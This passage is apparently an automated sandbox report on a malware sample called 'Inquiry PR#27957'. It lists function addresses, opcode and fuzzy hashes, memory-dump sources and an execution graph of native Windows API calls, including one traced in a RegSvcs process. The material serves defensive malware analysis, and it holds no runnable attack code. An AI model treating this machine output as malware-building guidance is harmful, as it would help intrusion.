                                                        Function 02DBDE20 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02DBDE86
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351684000.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2db0000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: b8400ea2d91f2a12520f57c8b4c4b3389519e3b5243ac817a76b3b1abbc02196
                                                        • Instruction ID: 6737bf0d7da0ebd5936831d59a03b12a88c0ca7c9ceac89f3f5f50bfe386091c
                                                        • Opcode Fuzzy Hash: b8400ea2d91f2a12520f57c8b4c4b3389519e3b5243ac817a76b3b1abbc02196
                                                        • Instruction Fuzzy Hash: AA11FDBA8006498FCB10DF9AC444ADEFBF5AF88214F10846AD869A7310C379A945CFA1
                                                        Function 0127D3D8 Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351206400.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_127d000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6f64e677aab898233319b71bff33191aa706f31a06db7d7170aa1b29849fe8d7
                                                        • Instruction ID: f01a1dd12288a7723f4a115e2c86711a260dcb597e3b83317c3c594efbc3ec9e
                                                        • Opcode Fuzzy Hash: 6f64e677aab898233319b71bff33191aa706f31a06db7d7170aa1b29849fe8d7
                                                        • Instruction Fuzzy Hash: 552103B6514208DFDB05DF94D9C0B67BB65FF88324F20C169E9090B256C376E456CAA2
                                                        Function 0128D01C Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351249908.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_128d000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a0f37353e85c8d7b5d99d1bf2f93293feadc1b0691d70010494f55e4ad198978
                                                        • Instruction ID: 84742a8cb0ee469bc05b96be018cd1e10d3d3fe735146f79b2ba8c41f9eb81c1
                                                        • Opcode Fuzzy Hash: a0f37353e85c8d7b5d99d1bf2f93293feadc1b0691d70010494f55e4ad198978
                                                        • Instruction Fuzzy Hash: 65212271618308DFDB15EFA4D880B26BB61EB88314F20C56DD94A4B2C2C376D45BCA62
                                                        Function 0128D1D4 Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351249908.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_128d000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7b07563f36628407518cd71ead8a775a16e3fefeda7b8ce14ccec1d0838953e4
                                                        • Instruction ID: fc71e82183dbe3a346f1209e04a310304c64657ad4bc495bd89351bd009fbceb
                                                        • Opcode Fuzzy Hash: 7b07563f36628407518cd71ead8a775a16e3fefeda7b8ce14ccec1d0838953e4
                                                        • Instruction Fuzzy Hash: F5212571564208DFDB05EF94D5C0B25BB61FB84324F20C56DD9094B2DBC376D85ACA61
                                                        Function 0127D3D3 Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351206400.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_127d000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                                        • Instruction ID: adc43af96e45afb15a01382f898f56a026b1205424deb443b3984594a26853b5
                                                        • Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                                        • Instruction Fuzzy Hash: F711DCB6404284DFCB02CF44D9C4B56BF72FB84324F24C2A9D9090B657C33AE45ACBA2
                                                        Function 0128D1CF Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351249908.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_128d000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                                        • Instruction ID: 7f08323adab4a0de9830c6b459eb9a4b652e8f13fc798a51f89d85cdcf398cc8
                                                        • Opcode Fuzzy Hash: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                                        • Instruction Fuzzy Hash: B411EB75544284CFDB02DF54C5C0B15BBA1FB84324F24C6A9D9494B29BC33AD40ACB61
                                                        Function 0128D017 Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351249908.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_128d000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                                        • Instruction ID: be4e1182c186dd1a080a562737a78252287d63aa71d9e869e3dda687213e879c
                                                        • Opcode Fuzzy Hash: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                                        • Instruction Fuzzy Hash: 6F11EB75508284CFDB02DF54D5C4B15BBA2FB84314F24C6AAD9494B696C33AD40BCBA2
                                                        Function 0127D745 Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351206400.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_127d000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e61d90f8cdfb84b963a7a64bc6d21134e485c309526533b01de3b368cd298892
                                                        • Instruction ID: ed340616bedc36bcb9613f86076a09405daee15ceada8a1146235e0cf591e161
                                                        • Opcode Fuzzy Hash: e61d90f8cdfb84b963a7a64bc6d21134e485c309526533b01de3b368cd298892
                                                        • Instruction Fuzzy Hash: 7E01DB311183899BF7289EA9CD84B67FF98DF41224F14C51AEE590E282D6B99840CAB1
                                                        Function 0127D744 Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351206400.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_127d000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a9a790ae4391df2ac43e921d6441fa2f47ad60f111d621169ff5cb83e5b776c9
                                                        • Instruction ID: f238dd94007d5a0a0bb8bb5728a7b28b2bb12e26d386d3b830dd53f52631ce55
                                                        • Opcode Fuzzy Hash: a9a790ae4391df2ac43e921d6441fa2f47ad60f111d621169ff5cb83e5b776c9
                                                        • Instruction Fuzzy Hash: BFF06D71408384AEE7149E5ADD88B63FF98EF81734F18C55AEE484E297C2799844CAB1

                                                        Non-executed Functions

                                                        Function 02DB9958 Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351684000.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2db0000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: f37ff328c5bc44d8c971bf572040dabebb340be59a2a94d0d80cb7c74f0168d9
                                                        • Instruction ID: 4312469faa567befd3556b04d514638fc747b732fff50b21193b16e0492eaf30
                                                        • Opcode Fuzzy Hash: f37ff328c5bc44d8c971bf572040dabebb340be59a2a94d0d80cb7c74f0168d9
                                                        • Instruction Fuzzy Hash: C351E231B142558FCB14CBA9D8946EEBBF2EFC9211B14857AD60ADB345EB30EC51CB90
                                                        Function 05432F58 Relevance: .3, Instructions: 315COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1364658564.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5430000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b2c17eeff4818d28d07f80f32f7adf8854c54ab565ad9e8f303d32bc300b933c
                                                        • Instruction ID: e296b28d51a9953392f78c7963bd1e92d10d8da3e2a0ba62505bbd46cddd169b
                                                        • Opcode Fuzzy Hash: b2c17eeff4818d28d07f80f32f7adf8854c54ab565ad9e8f303d32bc300b933c
                                                        • Instruction Fuzzy Hash: 4F1292B0C81745CAEB11EF65F95C18D3BA1BB8139CBD04A09D2652F3E1DBB8196ACF44
                                                        Function 073426D0 Relevance: .3, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d82d7b7e0e9504a7196756c3e5b330f492d98a0757367ebdc684ca7c740da072
                                                        • Instruction ID: 830d50d34fd65fcae78b7edbc87d1661d7afebe34e0d05bae479b023f460c768
                                                        • Opcode Fuzzy Hash: d82d7b7e0e9504a7196756c3e5b330f492d98a0757367ebdc684ca7c740da072
                                                        • Instruction Fuzzy Hash: 6CE1F9B4E102198FDB14DF99C580AAEBBF2FF89305F248159E819A735AD730AD41CF61
                                                        Function 073445E8 Relevance: .3, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fab0d500ad28727dfbf271c3c9622c3c0d3c9ff0077976f930a5fe8b10bb8a4e
                                                        • Instruction ID: fa89dfff23021ba27f876e37df0e8197cb8fc4d30cf634e21b110a860b8f05d7
                                                        • Opcode Fuzzy Hash: fab0d500ad28727dfbf271c3c9622c3c0d3c9ff0077976f930a5fe8b10bb8a4e
                                                        • Instruction Fuzzy Hash: 64E1D9B4E002598FDB18DFA9C580AAEBBF2FF89305F248169D419A7356D731AD41CF60
                                                        Function 07342298 Relevance: .3, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 754fe81298acb543d7cc3578e551d8477e075dba4187906a38d9a66503c2f492
                                                        • Instruction ID: a47bee7568daa5574e5dd734e18b8be62f0b0c82d822f723b1fe8709f71d454d
                                                        • Opcode Fuzzy Hash: 754fe81298acb543d7cc3578e551d8477e075dba4187906a38d9a66503c2f492
                                                        • Instruction Fuzzy Hash: F1E1D7B4E002198FDB18DFA9C590AAEBBF2FF89305F248169E419A7355D731AD41CF60
                                                        Function 073441B0 Relevance: .3, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f96ad9d594bf883b7d9cb9d92c579d036f8f2521efc1424272bf7dc7a430efc3
                                                        • Instruction ID: d691c26b66aa61c94878ad7fd0336824cf169e4dc97fd2f7480507bbe648e378
                                                        • Opcode Fuzzy Hash: f96ad9d594bf883b7d9cb9d92c579d036f8f2521efc1424272bf7dc7a430efc3
                                                        • Instruction Fuzzy Hash: 3EE1F9B4E002598FDB18DF99C580AAEBBF2FF89305F248169D419A735AD731AD41CF60
                                                        Function 05430B24 Relevance: .3, Instructions: 264COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1364658564.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5430000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6d0cc4f58fc45504c410ac5930049609c4137a388ffd353b944a0db671f70d49
                                                        • Instruction ID: 422653652a8fcf7c17920d6c230d5806f449a768d215649f27870d58bdfd13ca
                                                        • Opcode Fuzzy Hash: 6d0cc4f58fc45504c410ac5930049609c4137a388ffd353b944a0db671f70d49
                                                        • Instruction Fuzzy Hash: 0FA15E36E00215CFCF05DFB5C8485EEB7B2FF88304B1545AAE906AB265DB71E955CB80
                                                        Function 02DB9630 Relevance: .2, Instructions: 235COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351684000.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2db0000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 330a66912c4d99dffc8f29b36c29a8b4cf061483b9d6109073434f9dcc6d6873
                                                        • Instruction ID: f83b10988591c3d1bba0f4a95c5de887866742048bffa26b9271fc13eafdb569
                                                        • Opcode Fuzzy Hash: 330a66912c4d99dffc8f29b36c29a8b4cf061483b9d6109073434f9dcc6d6873
                                                        • Instruction Fuzzy Hash: 47816C36F101649FD754DB69C8A0B9EB7E3AFC8710F1A8065E40AEB365DB70AC01DB90
                                                        Function 05432F49 Relevance: .2, Instructions: 223COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1364658564.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5430000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0ee9ce72b81e664d549d1b03e5d39c6b31833ba582f63c56f052dd27f62b8193
                                                        • Instruction ID: 9e9a75baeb94761b3157712bc6c3b1c9193eeff08dd17c50f6f1d3bc6b2dd44f
                                                        • Opcode Fuzzy Hash: 0ee9ce72b81e664d549d1b03e5d39c6b31833ba582f63c56f052dd27f62b8193
                                                        • Instruction Fuzzy Hash: B4C1D4B0C81749CADB11EF65F85828D7BB1BB853ACF904A09D2616F3D0DBB4186ACF54
                                                        Function 02DB8210 Relevance: .2, Instructions: 210COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351684000.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2db0000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4cb46133481ba3d60aa10f335084fe528ab9d1694033d6cfa1f58f6e8869cfa7
                                                        • Instruction ID: d51538e614f43af8f3cb0c45259b69c7b3dd40921305eda90efb80eb9077fd01
                                                        • Opcode Fuzzy Hash: 4cb46133481ba3d60aa10f335084fe528ab9d1694033d6cfa1f58f6e8869cfa7
                                                        • Instruction Fuzzy Hash: BA81F5B8D4011ADFDF14CFAAE894AEEBBB1FF48305F10A655D402EB250DB319941CB50
                                                        Function 02DB96D1 Relevance: .2, Instructions: 188COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1351684000.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2db0000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 192fcc62ab16421e732d6c13bbf84498edfad430781975b2536b7a33520fa3e6
                                                        • Instruction ID: 09088bad151e1996ffe1c7014b4e3dd3763a4a81a4cd885d38b680e9224dfc0c
                                                        • Opcode Fuzzy Hash: 192fcc62ab16421e732d6c13bbf84498edfad430781975b2536b7a33520fa3e6
                                                        • Instruction Fuzzy Hash: 32614C36F105648FD754DB69C890B9EB7E3AFC8710F1A8164E40AEB366DE70AC01DB90
                                                        Function 073426C0 Relevance: .1, Instructions: 136COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8da66ecaf44582a98638a609831e844c39117a217996ee8857f68784f57478ed
                                                        • Instruction ID: ab2494ca577d65024b92862d024c4bc830c0f3ed96c910d21c0d87facbf53de3
                                                        • Opcode Fuzzy Hash: 8da66ecaf44582a98638a609831e844c39117a217996ee8857f68784f57478ed
                                                        • Instruction Fuzzy Hash: 675109B0E006198FDB18DFA9C5805AEFBF2BF89305F248169D418B7256D731AD42CFA1
                                                        Function 073445D8 Relevance: .1, Instructions: 136COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4ef020eb50c0eef4a67ee1d12d96b12c068ad7201f97eefa331184d3376d3a7e
                                                        • Instruction ID: 4a71363d05ba1f090e5f7e8781e3ec07151c1739759c4a7d27875f811a696d34
                                                        • Opcode Fuzzy Hash: 4ef020eb50c0eef4a67ee1d12d96b12c068ad7201f97eefa331184d3376d3a7e
                                                        • Instruction Fuzzy Hash: 76512EB5E002598FDB18DFA9C5405AEFBF2FF89305F148169D418A7256D730AD42CFA1
                                                        Function 07342289 Relevance: .1, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ec4eb40b1fc6fe179d79aaef278d352d8e3dad991886316c5d1a6aeb268d499c
                                                        • Instruction ID: 29b11083fbe54b9f82cc25f19e9cd25e778c24b0fbd81ddd5641e7d2c54c756b
                                                        • Opcode Fuzzy Hash: ec4eb40b1fc6fe179d79aaef278d352d8e3dad991886316c5d1a6aeb268d499c
                                                        • Instruction Fuzzy Hash: 9851F8B0E042198FDB18DFA9C5405AEFBF2FF89205F248169D458AB356D731A941CFA1
                                                        Function 073441AD Relevance: .1, Instructions: 129COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 297e155783a1b8fa6c8b545f9fe18050ab4d2cb24613f5638a78fb3f7141f9d6
                                                        • Instruction ID: 97a299450a67033810803b4edaf2d1a4223fc87caa21b57ec5fb2add7caebdfd
                                                        • Opcode Fuzzy Hash: 297e155783a1b8fa6c8b545f9fe18050ab4d2cb24613f5638a78fb3f7141f9d6
                                                        • Instruction Fuzzy Hash: BD5108B4E002598FDB18DFA9C5806AEFBF2FF89301F248169D418A7256D731AD41CFA1
                                                        Function 07348906 Relevance: .0, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1374101391.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7340000_Inquiry PR#27957.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 18b9f964d57a8acfb1f8607aab166e78ad1c9cb482aa953dd6fa3cc606b62eb1
                                                        • Instruction ID: 336410a93b4d77d215e0ddc236f20bce18a75a6cbf5b0c9971e84ae3b6e5093e
                                                        • Opcode Fuzzy Hash: 18b9f964d57a8acfb1f8607aab166e78ad1c9cb482aa953dd6fa3cc606b62eb1
                                                        • Instruction Fuzzy Hash: 3DC08CD699D004D6EA040C882C4C2FAF7FCC28B031F0433A2872EE39D29100B1269256

                                                        Execution Graph

                                                        Execution Coverage:1.2%
                                                        Dynamic/Decrypted Code Coverage:5.1%
                                                        Signature Coverage:8.1%
                                                        Total number of Nodes:136
                                                        Total number of Limit Nodes:9
                                                        execution_graph 95535 4246e3 95536 4246ff 95535->95536 95537 424727 95536->95537 95538 42473b 95536->95538 95539 42bdb3 NtClose 95537->95539 95545 42bdb3 95538->95545 95541 424730 95539->95541 95542 424744 95548 42df53 RtlAllocateHeap 95542->95548 95544 42474f 95546 42bdd0 95545->95546 95547 42bde1 NtClose 95546->95547 95547->95542 95548->95544 95549 42b383 95550 42b39d 95549->95550 95553 1662df0 LdrInitializeThunk 95550->95553 95551 42b3c5 95553->95551 95606 424a73 95607 424a8c 95606->95607 95608 424ad7 95607->95608 95611 424b17 95607->95611 95613 424b1c 95607->95613 95609 42de33 RtlFreeHeap 95608->95609 95610 424ae4 95609->95610 95612 42de33 RtlFreeHeap 95611->95612 95612->95613 95614 42ef13 95615 42ef23 95614->95615 95616 42ef29 95614->95616 95617 42df13 RtlAllocateHeap 95616->95617 95618 42ef4f 95617->95618 95554 41e223 95555 41e249 95554->95555 95559 41e33d 95555->95559 95560 42f043 95555->95560 95557 41e2de 95557->95559 95566 42b3d3 95557->95566 95561 42efb3 95560->95561 95562 42f010 95561->95562 95570 42df13 95561->95570 95562->95557 95564 42efed 95573 42de33 95564->95573 95567 42b3f0 95566->95567 95582 1662c0a 95567->95582 95568 42b41c 95568->95559 95576 42c0d3 95570->95576 95572 42df2e 95572->95564 95579 42c123 95573->95579 95575 42de4c 95575->95562 95577 42c0f0 95576->95577 95578 42c101 RtlAllocateHeap 95577->95578 95578->95572 95580 42c140 95579->95580 95581 42c151 RtlFreeHeap 95580->95581 95581->95575 95583 1662c11 95582->95583 95584 1662c1f LdrInitializeThunk 95582->95584 95583->95568 95584->95568 95585 413dc3 95586 413ddd 95585->95586 95591 417913 95586->95591 95588 413dfb 95589 413e40 95588->95589 95590 413e2f PostThreadMessageW 95588->95590 95590->95589 95592 417937 95591->95592 95593 417973 LdrLoadDll 95592->95593 95594 41793e 95592->95594 95593->95594 95594->95588 95619 41b053 95620 41b097 95619->95620 95621 41b0b8 95620->95621 95622 42bdb3 NtClose 95620->95622 95622->95621 95595 1662b60 LdrInitializeThunk 95623 418b18 95624 418b1d 95623->95624 95625 42bdb3 NtClose 95624->95625 95626 418b22 95625->95626 95596 4138cd 95597 41386e 95596->95597 95597->95596 95599 413916 95597->95599 95601 42c043 95597->95601 95602 42c05d 95601->95602 95605 1662c70 LdrInitializeThunk 95602->95605 95603 413875 95605->95603 95627 401add 95628 401b10 95627->95628 95628->95628 95631 42f3e3 95628->95631 95634 42da03 95631->95634 95635 42da26 95634->95635 95646 4076a3 95635->95646 95637 42da3c 95645 401c1a 95637->95645 95649 41ae63 95637->95649 95639 42da5b 95640 42da70 95639->95640 95664 42c173 95639->95664 95660 427a53 95640->95660 95643 42da8a 95644 42c173 ExitProcess 95643->95644 95644->95645 95648 4076b0 95646->95648 95667 4165d3 95646->95667 95648->95637 95650 41ae8f 95649->95650 95678 41ad53 95650->95678 95653 41aed4 95656 41aef0 95653->95656 95658 42bdb3 NtClose 95653->95658 95654 41aebc 95655 41aec7 95654->95655 95657 42bdb3 NtClose 95654->95657 95655->95639 95656->95639 95657->95655 95659 41aee6 95658->95659 95659->95639 95661 427ab5 95660->95661 95663 427ac2 95661->95663 95689 418473 95661->95689 95663->95643 95665 42c190 95664->95665 95666 42c1a1 ExitProcess 95665->95666 95666->95640 95668 4165f0 95667->95668 95670 416609 95668->95670 95671 42c813 95668->95671 95670->95648 95673 42c82d 95671->95673 95672 42c85c 95672->95670 95673->95672 95674 42b3d3 LdrInitializeThunk 95673->95674 95675 42c8bc 95674->95675 95676 42de33 RtlFreeHeap 95675->95676 95677 42c8d2 95676->95677 95677->95670 95679 41ad6d 95678->95679 95683 41ae49 95678->95683 95684 42b473 95679->95684 95682 42bdb3 NtClose 95682->95683 95683->95653 95683->95654 95685 42b48d 95684->95685 95688 16635c0 LdrInitializeThunk 95685->95688 95686 41ae3d 95686->95682 95688->95686 95690 41849d 95689->95690 95696 4188fb 95690->95696 95697 413a33 95690->95697 95692 4185aa 95693 42de33 RtlFreeHeap 95692->95693 95692->95696 95694 4185c2 95693->95694 95695 42c173 ExitProcess 95694->95695 95694->95696 95695->95696 95696->95663 95701 413a53 95697->95701 95699 413ab2 95699->95692 95700 413abc 95700->95692 95701->95700 95702 41b133 RtlFreeHeap LdrInitializeThunk 95701->95702 95702->95699

                                                        Executed Functions

                                                        Function 00417913 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 102 417913-41793c call 42eb33 105 417942-417950 call 42f053 102->105 106 41793e-417941 102->106 109 417960-417971 call 42d4f3 105->109 110 417952-41795d call 42f2f3 105->110 115 417973-417987 LdrLoadDll 109->115 116 41798a-41798d 109->116 110->109 115->116
                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417985
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_400000_RegSvcs.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: cd9ef4a3d1cd7a6e3907838b070924880f9e6a418b5da6b2b4a7b2e5adf3a120
                                                        • Instruction ID: 74945818648602d11457b92e75b4ed94df5a456d8a4b583e1234a9673d5c7db5
                                                        • Opcode Fuzzy Hash: cd9ef4a3d1cd7a6e3907838b070924880f9e6a418b5da6b2b4a7b2e5adf3a120
                                                        • Instruction Fuzzy Hash: 360175B5E4010DABDF10DBE5DC42FDEB378AB54308F0041A6F90897240F679EB488B95
                                                        Function 0042BDB3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
